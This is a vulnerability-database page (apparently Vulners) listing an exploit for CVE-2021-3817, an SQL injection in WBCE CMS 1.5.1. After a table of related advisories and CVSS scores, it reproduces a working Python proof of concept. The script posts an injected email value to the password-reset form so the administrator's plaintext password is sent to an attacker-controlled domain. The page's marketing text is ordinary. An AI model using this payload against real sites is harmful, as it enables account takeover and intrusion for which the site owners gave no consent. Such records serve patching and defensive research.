Lucene search
K

WBCE CMS 1.5.1 Admin Password Reset

🗓️ 21 Dec 2021 00:00:00Reported by citrilType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 370 Views

WBCE CMS 1.5.1 Admin Password Reset exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WBCE CMS 1.5.1 - Admin Password Reset Exploit
20 Dec 202100:00
zdt
Huntr
SQL Injection in wbce/wbce_cms
27 Nov 202119:15
huntr
Circl
CVE-2021-3817
9 Dec 202114:23
circl
CNNVD
WBCE CMS SQL注入漏洞
9 Dec 202100:00
cnnvd
CVE
CVE-2021-3817
9 Dec 202110:50
cve
Cvelist
CVE-2021-3817 SQL Injection in wbce/wbce_cms
9 Dec 202110:50
cvelist
Exploit DB
WBCE CMS 1.5.1 - Admin Password Reset
20 Dec 202100:00
exploitdb
NVD
CVE-2021-3817
9 Dec 202111:15
nvd
Prion
Command injection
9 Dec 202111:15
prion
RedhatCVE
CVE-2021-3817
22 May 202518:44
redhatcve
Rows per page
`# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset  
# Google Dork: intext: "Way Better Content Editing"  
# Date: 20/12/2021  
# Exploit Author: citril or https://github.com/maxway2021  
# Vendor Homepage: https://wbce.org/  
# Software Link: https://wbce.org/de/downloads/  
# Version: <= 1.5.1  
# Tested on: Linux  
# CVE : CVE-2021-3817  
# Github repo: https://github.com/WBCE/WBCE_CMS  
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75  
  
import requests  
  
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment  
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature  
  
headers = {  
'User-Agent': 'Mozilla/5.0',  
'Accept':  
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',  
'Accept-Language': 'en-US,en;q=0.5',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Connection': 'close'  
}  
  
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"  
  
r = requests.post(url = _url, headers = headers, data = _p)  
if r.status_code == 200:  
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Dec 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 27.5
CVSS 3.19.8
CVSS 39.8
EPSS0.53819
370